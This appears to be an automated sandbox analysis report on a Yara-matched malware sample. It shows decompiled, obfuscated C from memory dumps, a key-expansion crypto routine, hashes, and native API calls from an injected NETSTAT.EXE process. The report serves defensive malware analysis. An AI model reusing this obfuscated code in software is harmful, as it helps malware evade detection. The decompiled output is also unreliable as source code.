                                                          C-Code - Quality: 45%
                                                          			E0041C527(signed int __eax, signed int __ebx, signed int __ecx, signed int __edx, signed int __esi) {
				void* _v3;
				signed int _t24;
				signed int _t27;
				signed char _t35;
				signed int _t37;
				signed int _t40;
				signed int _t43;
				signed int _t50;
				signed int _t53;
				signed int _t54;
				signed int _t65;
				signed int _t77;

				_t65 = __esi;
				_t50 = __edx;
				_t40 = __ecx;
				_t37 = __ebx;
				_t24 = __eax;
				goto L1;
				do {
					do {
						do {
							do {
								do {
									L1:
									 *0x939ff7b7 =  *0x939ff7b7 | _t50;
									_t1 = _t37;
									_t37 =  *0x8f83e7b0;
									 *0x8f83e7b0 = _t1;
								} while ( *0x939ff7b7 == 0);
								_push( *0xdc624d74);
								_t65 = _t65 ^ 0xc419e217;
								 *0x84e5c4bb =  *0x84e5c4bb >> 0xfb;
							} while ( *0x84e5c4bb != 0);
							asm("sbb dh, [0x73aeb002]");
							asm("adc edx, [0xefca2585]");
							 *0xa616efa8 = _t50;
							asm("adc [0xa91945c6], bh");
							 *0x16efa8e0 =  *0x16efa8e0 - _t40;
							asm("rol dword [0x7775c839], 0xf9");
							asm("sbb [0xef45d8a8], ch");
							_t53 =  *0xa616efa8 +  *0xc4a80099 | 0x000000f2;
							_pop( *0x32c1c68f);
							_push(_t24 ^ 0x00000018);
							asm("rcr dword [0x81d04116], 0xa1");
							asm("sbb ah, 0x3a");
							asm("adc edx, [0x50405217]");
							asm("adc ebp, [0xef45d88d]");
							asm("adc bl, 0x3a");
							asm("sbb [0x9cba1d16], esi");
							_t27 = 0xef45d88d;
							 *0xaddd0fb4 =  *0xaddd0fb4 >> 0x2f;
							asm("adc edx, 0xef45d88d");
							asm("rcr byte [0xe7553110], 0x8d");
							_push( *0x453d99a1);
							 *0x32ee16ef = _t40;
							asm("adc esi, 0x1db40ffd");
							asm("sbb ebp, [0xe0cc3283]");
							 *0x2b16efa8 =  *0x2b16efa8 - _t53;
							asm("ror byte [0x16efa8e0], 0x95");
							_t54 = _t53 & 0xbe17ff2f;
							_t43 = ( *0x32ee16ef ^ 0x0000008a) & 0x000000e0;
							 *0xff16efa8 =  *0xff16efa8 + _t54;
							 *0xc62b7093 =  *0xc62b7093 & _t27;
							asm("sbb [0xcc32c5f7], edx");
							asm("ror byte [0x16efa8e0], 0x5a");
							 *0x4fa34f2 = _t54;
							asm("sbb ch, 0xb0");
							_pop( *0xcc32b9d9);
							asm("sbb cl, [0x16efa8e0]");
							 *0x16d24939 =  *0x16d24939 << 5;
							asm("stosb");
							 *0x5f828ee2 =  *0x5f828ee2 << 0x63;
							asm("adc edx, [0x32ccebb8]");
							 *0xefa8e0cc = _t43;
							_t65 = 0x67b3c621 +  *0xc0d601ee -  *0x16d24939 -  *0x8ce2a816;
							 *0xa8e0cc32 =  *0xa8e0cc32 << 0x6a;
							asm("ror dword [0xd79c0126], 0xa2");
							asm("adc [0xe0cc32c1], esp");
							_t77 =  *0x9076a2f7 |  *0xf9af869a;
							 *0x420816d2 = _t54;
							asm("adc esi, [0xe0cc32ba]");
							asm("adc dh, 0xa8");
							_t24 = (_t27 ^  *0xaece9d8d) & 0xf5bda798 ^ 0x395fbed3;
							_t40 = _t43;
							_t37 = _t37 &  *0xdd634e75 &  *0x4052173a |  *0x621c16d2;
							_t50 = _t54 &  *0x3e0416ef & 0x0000001c;
							asm("rcr dword [0xc1dba407], 0xea");
							asm("rcl byte [0xa8e0cc32], 0xae");
						} while ( *0xf2c1ab9c + 0xa2fe16ef >= 0);
						asm("rol dword [0x9a7c73], 0x45");
						asm("ror byte [0xd8a8c4a8], 0x4e");
						 *0x49395fa8 = _t24;
						asm("ror byte [0x947a16d2], 0x99");
						asm("ror dword [0xdec32e33], 0xf6");
						_t77 = _t77 +  *0xe0cc32c1;
						asm("adc [0xc16efa8], ch");
						asm("rcl byte [0xecc9b4a0], 0x8e");
						 *0xddbd3ccd =  *0xddbd3ccd >> 0xe6;
						_t24 =  *0x49395fa8 | 0x000000a8;
						asm("sbb [0xac704b93], esi");
						 *0x395faf88 =  *0x395faf88 & _t24;
						_t37 = _t37 |  *0x241016d2;
						_t65 = _t65 | 0x0fb45494;
						asm("sbb edi, [0xd88daddd]");
						_t40 = 0x000000a0 &  *0x99d1b49b &  *0xe04c16ef;
					} while (_t40 > 0);
					 *0xa8008977 =  *0xa8008977 | _t37;
					_t77 = _t77 -  *0x45d8a8c4;
					asm("rol dword [0xd68f16ef], 0xe6");
					 *0x826380 =  *0x826380 << 0x2f;
					 *0xd8a8c4a8 =  *0xd8a8c4a8 >> 0x91;
					_t24 =  *0xf9e2bc0 & 0x00000088 &  *0x121f16ef ^ 0x0f9e2bbc;
					asm("rcr byte [0x4b16ef88], 0x82");
					asm("sbb bl, 0xe2");
					asm("sbb esp, [0xf0cc319f]");
					asm("adc edi, 0x395fc2cc");
					_t40 = (_t40 & 0x40ecb2a1) - 1;
					 *0x941616d2 =  *0x941616d2 ^ _t37;
					_t37 = _t37 |  *0xdec32e33;
					_t50 = (_t50 ^ 0x40ecb2a1) - 0xa8;
					 *0xe26216ef =  *0xe26216ef + _t37;
					_pop( *0x9a8081);
					 *0xd6b616ef =  *0xd6b616ef - _t24;
				} while ( *0xd6b616ef < 0);
				_t35 = _t24 -  *0x52173a78 + 1;
				_push(_t35);
				 *0xef45d88d =  *0xef45d88d - _t50;
				return _t35 | 0x00000016;
			}















                                                          0x0041c527
                                                          0x0041c527
                                                          0x0041c527
                                                          0x0041c527
                                                          0x0041c527
                                                          0x0041c528
                                                          0x0041c52a
                                                          0x0041c52a
                                                          0x0041c52a
                                                          0x0041c52a
                                                          0x0041c52a
                                                          0x0041c52a
                                                          0x0041c52a
                                                          0x0041c530
                                                          0x0041c530
                                                          0x0041c530
                                                          0x0041c530
                                                          0x0041c538
                                                          0x0041c53e
                                                          0x0041c544
                                                          0x0041c544
                                                          0x0041c556
                                                          0x0041c580
                                                          0x0041c58c
                                                          0x0041c592
                                                          0x0041c59e
                                                          0x0041c5a4
                                                          0x0041c5b1
                                                          0x0041c5bd
                                                          0x0041c5c0
                                                          0x0041c5d8
                                                          0x0041c5de
                                                          0x0041c5e5
                                                          0x0041c5e8
                                                          0x0041c5ee
                                                          0x0041c5fa
                                                          0x0041c608
                                                          0x0041c60e
                                                          0x0041c60f
                                                          0x0041c616
                                                          0x0041c622
                                                          0x0041c629
                                                          0x0041c62f
                                                          0x0041c635
                                                          0x0041c63b
                                                          0x0041c641
                                                          0x0041c653
                                                          0x0041c65d
                                                          0x0041c669
                                                          0x0041c66c
                                                          0x0041c672
                                                          0x0041c678
                                                          0x0041c67e
                                                          0x0041c685
                                                          0x0041c68b
                                                          0x0041c68e
                                                          0x0041c694
                                                          0x0041c6a6
                                                          0x0041c6b3
                                                          0x0041c6b4
                                                          0x0041c6c7
                                                          0x0041c6cd
                                                          0x0041c6d3
                                                          0x0041c6df
                                                          0x0041c6ec
                                                          0x0041c6f3
                                                          0x0041c701
                                                          0x0041c70e
                                                          0x0041c71a
                                                          0x0041c720
                                                          0x0041c72e
                                                          0x0041c733
                                                          0x0041c734
                                                          0x0041c73a
                                                          0x0041c73d
                                                          0x0041c744
                                                          0x0041c74b
                                                          0x0041c757
                                                          0x0041c75e
                                                          0x0041c773
                                                          0x0041c779
                                                          0x0041c780
                                                          0x0041c787
                                                          0x0041c78d
                                                          0x0041c794
                                                          0x0041c7a8
                                                          0x0041c7b5
                                                          0x0041c7be
                                                          0x0041c7c4
                                                          0x0041c7cb
                                                          0x0041c7d1
                                                          0x0041c7d7
                                                          0x0041c7de
                                                          0x0041c7de
                                                          0x0041c7eb
                                                          0x0041c7f1
                                                          0x0041c80a
                                                          0x0041c811
                                                          0x0041c818
                                                          0x0041c826
                                                          0x0041c831
                                                          0x0041c838
                                                          0x0041c83b
                                                          0x0041c841
                                                          0x0041c847
                                                          0x0041c848
                                                          0x0041c84e
                                                          0x0041c85a
                                                          0x0041c85d
                                                          0x0041c863
                                                          0x0041c870
                                                          0x0041c870
                                                          0x0041c882
                                                          0x0041c883
                                                          0x0041c884
                                                          0x0041c88c

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.771173980.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 733738f37fd50562829fd84cf39da238086bdfae88b1b9ff24622f4cba033508
                                                          • Instruction ID: 665e9989611c4ed37eac9b4772acfbe6625f6561b52e1310b97fb6a51117ef0c
                                                          • Opcode Fuzzy Hash: 733738f37fd50562829fd84cf39da238086bdfae88b1b9ff24622f4cba033508
                                                          • Instruction Fuzzy Hash: 62811F329597D1DFE705DB78EC9A6423FB2E78633074C07C9C8A25B2D2D36024AACB45
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00402D90, Relevance: .2, Instructions: 165COMMONCrypto
                                                          Download Yara Rule
                                                          C-Code - Quality: 67%
                                                          			E00402D90(intOrPtr _a4, signed int* _a8, signed int* _a12, intOrPtr _a16) {
				signed int _t66;
				signed int* _t69;
				signed int* _t81;
				signed int _t94;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int* _t110;
				signed int _t127;
				signed int _t129;
				signed int _t133;
				signed int _t152;
				intOrPtr _t171;

				_t81 = _a12;
				_t110 = _a8;
				asm("ror esi, 0x8");
				asm("rol eax, 0x8");
				 *_t110 =  *_t81 & 0xff00ff00 |  *_t81 & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t110[1] = _t81[1] & 0xff00ff00 | _t81[1] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t110[2] = _t81[2] & 0xff00ff00 | _t81[2] & 0x00ff00ff;
				_t66 =  &(_t110[1]);
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t110[3] = _t81[3] & 0xff00ff00 | _t81[3] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t110[4] = _t81[4] & 0xff00ff00 | _t81[4] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t110[5] = _t81[5] & 0xff00ff00 | _t81[5] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t110[6] = _t81[6] & 0xff00ff00 | _t81[6] & 0x00ff00ff;
				asm("ror esi, 0x8");
				asm("rol ecx, 0x8");
				_t110[7] = _t81[7] & 0xff00ff00 | _t81[7] & 0x00ff00ff;
				if(_a16 != 0x100) {
					L4:
					return _t66 | 0xffffffff;
				} else {
					_t171 = _a4;
					_t69 = 0;
					_a12 = 0;
					while(1) {
						_t152 =  *(_t66 + 0x18);
						_t94 = ( *(_t171 + 4 + (_t152 >> 0x00000010 & 0x000000ff) * 4) & 0xffff0000 ^ ( *(_t171 +  &(_t69[0x241])) & 0x000000ff) << 0x00000010) << 0x00000008 ^  *(_t171 + 4 + (_t152 >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t171 + 5 + (_t152 >> 0x00000018 & 0x000000ff) * 4) & 0x000000ff ^  *(_t171 + 4 + (_t152 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t66 - 4);
						_t127 =  *_t66 ^ _t94;
						 *(_t66 + 0x1c) = _t94;
						_t96 =  *(_t66 + 4) ^ _t127;
						 *(_t66 + 0x20) = _t127;
						_t129 =  *(_t66 + 8) ^ _t96;
						 *(_t66 + 0x24) = _t96;
						 *(_t66 + 0x28) = _t129;
						if(_t69 == 6) {
							break;
						}
						_t106 = ( *(_t171 + 4 + (_t129 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t171 + 4 + (_t129 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t171 + 4 + (_t129 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t171 + 5 + (_t129 & 0x000000ff) * 4) & 0x000000ff ^  *(_t66 + 0xc);
						_t133 =  *(_t66 + 0x10) ^ _t106;
						 *(_t66 + 0x2c) = _t106;
						_t108 =  *(_t66 + 0x14) ^ _t133;
						 *(_t66 + 0x34) = _t108;
						_t69 =  &(_a12[0]);
						 *(_t66 + 0x30) = _t133;
						 *(_t66 + 0x38) = _t108 ^ _t152;
						_t66 = _t66 + 0x20;
						_a12 = _t69;
						if(_t69 < 7) {
							continue;
						} else {
							goto L4;
						}
						goto L6;
					}
					return 0xe;
				}
				L6:
			}
















                                                          0x00402d93
                                                          0x00402d98
                                                          0x00402da0
                                                          0x00402da9
                                                          0x00402db3
                                                          0x00402dba
                                                          0x00402dc3
                                                          0x00402dce
                                                          0x00402dd6
                                                          0x00402ddf
                                                          0x00402dea
                                                          0x00402df0
                                                          0x00402df5
                                                          0x00402dfe
                                                          0x00402e09
                                                          0x00402e11
                                                          0x00402e1a
                                                          0x00402e25
                                                          0x00402e2d
                                                          0x00402e36
                                                          0x00402e41
                                                          0x00402e49
                                                          0x00402e52
                                                          0x00402e5d
                                                          0x00402e65
                                                          0x00402e6e
                                                          0x00402e80
                                                          0x00402e83
                                                          0x00402f9f
                                                          0x00402fa4
                                                          0x00402e89
                                                          0x00402e89
                                                          0x00402e8c
                                                          0x00402e8e
                                                          0x00402e91
                                                          0x00402e91
                                                          0x00402ef6
                                                          0x00402efb
                                                          0x00402efd
                                                          0x00402f03
                                                          0x00402f05
                                                          0x00402f0b
                                                          0x00402f0d
                                                          0x00402f10
                                                          0x00402f16
                                                          0x00000000
                                                          0x00000000
                                                          0x00402f72
                                                          0x00402f78
                                                          0x00402f7a
                                                          0x00402f80
                                                          0x00402f82
                                                          0x00402f87
                                                          0x00402f88
                                                          0x00402f8b
                                                          0x00402f8e
                                                          0x00402f91
                                                          0x00402f97
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00402f97
                                                          0x00402fae
                                                          0x00402fae
                                                          0x00000000

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.771173980.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: baad548f5feed02f012b2fc10accbe050e72558d66b692510d210734a80849a9
                                                          • Instruction ID: 72940b2de139f4e90958e9e8763c4e4336f87cc22ae5d142da70f60c8c24c1bc
                                                          • Opcode Fuzzy Hash: baad548f5feed02f012b2fc10accbe050e72558d66b692510d210734a80849a9
                                                          • Instruction Fuzzy Hash: AB5173B3E14A214BD3188E09CD40631B792FFD8312B5F81BEDD199B397CE74E9529A90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0041CDA7, Relevance: .1, Instructions: 141COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.771173980.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d670d4d38fdf77a756ee94b5e4380026c37752c5deccbcf89f00d25642d08356
                                                          • Instruction ID: 62b0d1059bd66647950636a3eb0902d9ce96ff7ea7356a0a5b123cf635e650a7
                                                          • Opcode Fuzzy Hash: d670d4d38fdf77a756ee94b5e4380026c37752c5deccbcf89f00d25642d08356
                                                          • Instruction Fuzzy Hash: E7616172409391DFDB16CF39DC9A7923FB6F782320B48428EC8A1A3192C7742595CB89
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0041CE79, Relevance: .1, Instructions: 136COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.771173980.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 16a01d4c93d5fc08b064c214c1baadb264fe16e62b0a1b8b42cb5eb6c04721c6
                                                          • Instruction ID: d07376f48880177a38d9be60a050063a7ab5724f17b22ab69351c2e1417d02b7
                                                          • Opcode Fuzzy Hash: 16a01d4c93d5fc08b064c214c1baadb264fe16e62b0a1b8b42cb5eb6c04721c6
                                                          • Instruction Fuzzy Hash: F8518872808B91CFDB16CF79CD8A6523FB6F792724748834ED86167192CB742456CB88
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0041CF31, Relevance: .1, Instructions: 136COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.771173980.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b241d276ff197cb2740df743a662a33320d0db6e0cbebb4ab2858b6db930f660
                                                          • Instruction ID: ac1fd5840d786714c9c2e7d6fa974784643761f7f64f07fb08ee8a6d0e82c45a
                                                          • Opcode Fuzzy Hash: b241d276ff197cb2740df743a662a33320d0db6e0cbebb4ab2858b6db930f660
                                                          • Instruction Fuzzy Hash: 72518472809792CFC72ADF79CD9A2913F76E793734348438ED8A1A3592CB341555CB88
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0041CD52, Relevance: .1, Instructions: 114COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.771173980.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 86d602aa6ecb0c3a510438a6c25dc52d52b18fab545461c4e65612a454b1b757
                                                          • Instruction ID: f2bcde24de8f0420d2b1b6084542221593991e2d4f774dccda4a93acb30ef077
                                                          • Opcode Fuzzy Hash: 86d602aa6ecb0c3a510438a6c25dc52d52b18fab545461c4e65612a454b1b757
                                                          • Instruction Fuzzy Hash: C25165B2809791CFD726DF79CC896923F72F792320348434ED861631D2D7741555CB88
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00401030, Relevance: .1, Instructions: 108COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.771173980.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a4f1a47e469db01a1eef6c7f2d5b49e19d955ffd97c7228385fc8c35807cfa85
                                                          • Instruction ID: 9ce4faf4bd6c29c48d5e9242fd1ccb7de96948774e055271f7c113e60250bd75
                                                          • Opcode Fuzzy Hash: a4f1a47e469db01a1eef6c7f2d5b49e19d955ffd97c7228385fc8c35807cfa85
                                                          • Instruction Fuzzy Hash: 203180116596F10ED30E836D08BDA75AEC18E9720174EC2FEDADA6F2F3C0888408D3A5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00406A94, Relevance: .0, Instructions: 17COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.771173980.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ae092a440b8bc39f609e0fdf1dd48155cfcb154c342c77e33ad299cc5e4f4646
                                                          • Instruction ID: d7870d910e4c816f083e1c383929c3be714ad398599039e3be77a02ebb02318c
                                                          • Opcode Fuzzy Hash: ae092a440b8bc39f609e0fdf1dd48155cfcb154c342c77e33ad299cc5e4f4646
                                                          • Instruction Fuzzy Hash: E4C08072A295801BD255CA0DAC953B4F35DD747134F2011C7D40DFB548C447C4414349
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0041567E, Relevance: .0, Instructions: 15COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.771173980.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2d5af0f18e605d601b6667a6ad4c140b5812b12c1669ce5ab3fab6b81998aed4
                                                          • Instruction ID: 3bbd059444eb240b318d4a8f7c67d3016abb7a5084403023e245326c8855afbd
                                                          • Opcode Fuzzy Hash: 2d5af0f18e605d601b6667a6ad4c140b5812b12c1669ce5ab3fab6b81998aed4
                                                          • Instruction Fuzzy Hash: 38B09222B860280610218C093D018F4F3689087825B0023A7DC08E76009102C01201D9
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Analysis Process: NETSTAT.EXE PID: 7056 Parent PID: 3424 NETSTAT.EXECOMMON

                                                          Executed Functions

                                                          Function 009681B0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • NtCreateFile.NTDLL(00000060,00000000,.z`,00963B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00963B87,007A002E,00000000,00000060,00000000,00000000), ref: 009681FD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.902331087.0000000000950000.00000040.00000001.sdmp, Offset: 00950000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateFile
                                                          • String ID: .z`
                                                          • API String ID: 823142352-1441809116
                                                          • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                          • Instruction ID: 2cdd42d4c601b1943c3af0484d2ea30476dab1d1db81d59defbd382ac37a1ed5
                                                          • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                          • Instruction Fuzzy Hash: B0F0B6B2200108ABCB08CF88DC95EEB77ADAF8C754F158248BA0D97241C630E8118BA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 009681AC, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • NtCreateFile.NTDLL(00000060,00000000,.z`,00963B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00963B87,007A002E,00000000,00000060,00000000,00000000), ref: 009681FD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.902331087.0000000000950000.00000040.00000001.sdmp, Offset: 00950000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateFile
                                                          • String ID: .z`
                                                          • API String ID: 823142352-1441809116
                                                          • Opcode ID: b57314f7c58de4e5c159fe2642d11787ea8875389720d6824d64ae0a2f8356fc
                                                          • Instruction ID: c9e0dd7f063818f80b047f9f1589b81930a7e85eefc5f8e7bc6da0c89e8357db
                                                          • Opcode Fuzzy Hash: b57314f7c58de4e5c159fe2642d11787ea8875389720d6824d64ae0a2f8356fc
                                                          • Instruction Fuzzy Hash: 5701B2B2200108AFCB48CF98DC95EEB77A9AF8C354F158248FA1DD7241DA30E811CBA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00968202, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 38filenativeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • NtCreateFile.NTDLL(00000060,00000000,.z`,00963B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00963B87,007A002E,00000000,00000060,00000000,00000000), ref: 009681FD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.902331087.0000000000950000.00000040.00000001.sdmp, Offset: 00950000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateFile
                                                          • String ID: .z`
                                                          • API String ID: 823142352-1441809116
                                                          • Opcode ID: 8c611135a10aadc5e8670315ff8e2429ec392b1ad6360f930bdda4e6ba05dbc7
                                                          • Instruction ID: e253d6d36e114db31c3b5db1d424f2f63a17abcaad2e482b89e28faacec95c4b
                                                          • Opcode Fuzzy Hash: 8c611135a10aadc5e8670315ff8e2429ec392b1ad6360f930bdda4e6ba05dbc7
                                                          • Instruction Fuzzy Hash: 59F0B2B6205549AFCB48CF8CEC80CDB77A9AF8D314B159249FA5DD3251C630E852CBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00968260, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • NtReadFile.NTDLL(00963D42,5E972F59,FFFFFFFF,00963A01,?,?,00963D42,?,00963A01,FFFFFFFF,5E972F59,00963D42,?,00000000), ref: 009682A5
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.902331087.0000000000950000.00000040.00000001.sdmp, Offset: 00950000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FileRead
                                                          • String ID:
                                                          • API String ID: 2738559852-0
                                                          • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                          • Instruction ID: 4a696bd85db4cf551b14789e557d3361c5196e8020192a187b49b967c1ff7acd
                                                          • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                          • Instruction Fuzzy Hash: 8EF0A4B2200208ABCB14DF89DC91EEB77ADAF8C754F158248BA1D97241DA30E8118BA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0096840A, Relevance: 1.5, APIs: 1, Instructions: 32memorynativeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00952D11,00002000,00003000,00000004), ref: 009683C9
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.902331087.0000000000950000.00000040.00000001.sdmp, Offset: 00950000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateMemoryVirtual
                                                          • String ID:
                                                          • API String ID: 2167126740-0
                                                          • Opcode ID: c6af8ae8c0b183eff976eef3b4de7ead0c8ca34d00109bf4bc0e99980df97430
                                                          • Instruction ID: f0c1bd0fb027c87e990d65dbc4bbc87580491fbd575d6168174f5dd8c08dc9a0
                                                          • Opcode Fuzzy Hash: c6af8ae8c0b183eff976eef3b4de7ead0c8ca34d00109bf4bc0e99980df97430
                                                          • Instruction Fuzzy Hash: FCF0F8B2200118ABCB14DF88DC81EEB77ADAF98750F158659BA1C97241D631E911CBB0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00968390, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00952D11,00002000,00003000,00000004), ref: 009683C9
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.902331087.0000000000950000.00000040.00000001.sdmp, Offset: 00950000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateMemoryVirtual
                                                          • String ID:
                                                          • API String ID: 2167126740-0
                                                          • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                          • Instruction ID: a06a2a033abd146d9dedd15aa0ce6dd776b7b37ed9c698b5ca043b12912a08ac
                                                          • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                          • Instruction Fuzzy Hash: DDF01CB1200208ABCB14DF89CC81EE777ADAF88750F118148BE0897241C630F810CBF0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 009682E0, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • NtClose.NTDLL(00963D20,?,?,00963D20,00000000,FFFFFFFF), ref: 00968305
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.902331087.0000000000950000.00000040.00000001.sdmp, Offset: 00950000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Close
                                                          • String ID:
                                                          • API String ID: 3535843008-0
                                                          • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                          • Instruction ID: 08f235d356ca820c6bdf0dae741fb1cfc21f70c79ba153547757f40fbe85d686
                                                          • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                          • Instruction Fuzzy Hash: EFD012752002146BD710EF98CC45FD7775CEF44750F154555BA185B282C930F90086E0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 03479710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.903134301.0000000003410000.00000040.00000001.sdmp, Offset: 03410000, based on PE: true
                                                          • Associated: 0000000A.00000002.903329978.000000000352B000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000A.00000002.903338998.000000000352F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 406f17704627e33c338aa3ae5af0b11b1d4469a55a6696de008f443786638e8b
                                                          • Instruction ID: 17bd24848fc52b70bdbe2f9b810b8da7f53ba008d0b026c460894417c19a1646
                                                          • Opcode Fuzzy Hash: 406f17704627e33c338aa3ae5af0b11b1d4469a55a6696de008f443786638e8b
